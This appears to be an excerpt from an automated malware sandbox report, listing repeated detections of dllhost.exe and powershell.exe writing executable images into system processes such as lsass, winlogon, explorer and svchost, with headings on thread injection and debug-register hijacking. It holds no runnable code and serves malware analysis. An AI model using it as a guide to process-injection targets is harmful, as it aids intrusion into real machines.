Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B421F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B421F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24D756E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24D75710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1F0C6720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1F0C6750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1EBD5460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1EBD5490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B4448A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B4448D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DBE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FE3A940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DC10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FE3BA50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1B6C0940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1B6C0990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 18FE8A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2C9A6100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2C9A6150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0D9CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0F4010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1F1ACC50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1F1ACD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1F188E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA71D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 25791060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA73E60000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 4084 base: 8260000 value: 4D
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 4084 base: 8260000 value: 4D
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 7624 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 2080
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 2384
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 7624 1 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 8500000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 509BC5A010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 158709A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 26DB1600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 158709A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 26DB1630000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2917C380000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22382770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2917C380000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1486AD40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1486AD70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24BD3CD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 269B9FD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 269BA660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22054D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22055340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27C57DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27C57DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A333B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A333B70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F174530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23315740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F174530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1876D540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23315740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15104330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22308E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1876D540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E731800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15104330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22308E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: D50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E731800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 209D2560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: D50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 209D2560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2036E550000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC5C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2036E550000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2671A930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2671A930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 282A2110000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 282A2110000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 2537C620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29B59750000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 2537C620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29B59750000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21744F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F02ED50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21744F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 239543A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B9C9A20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B9C9CB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29F0AD90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29F0ADC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C585A50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C585A80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BEA4190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BEA41C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1380000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1050000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1070000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 720000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000
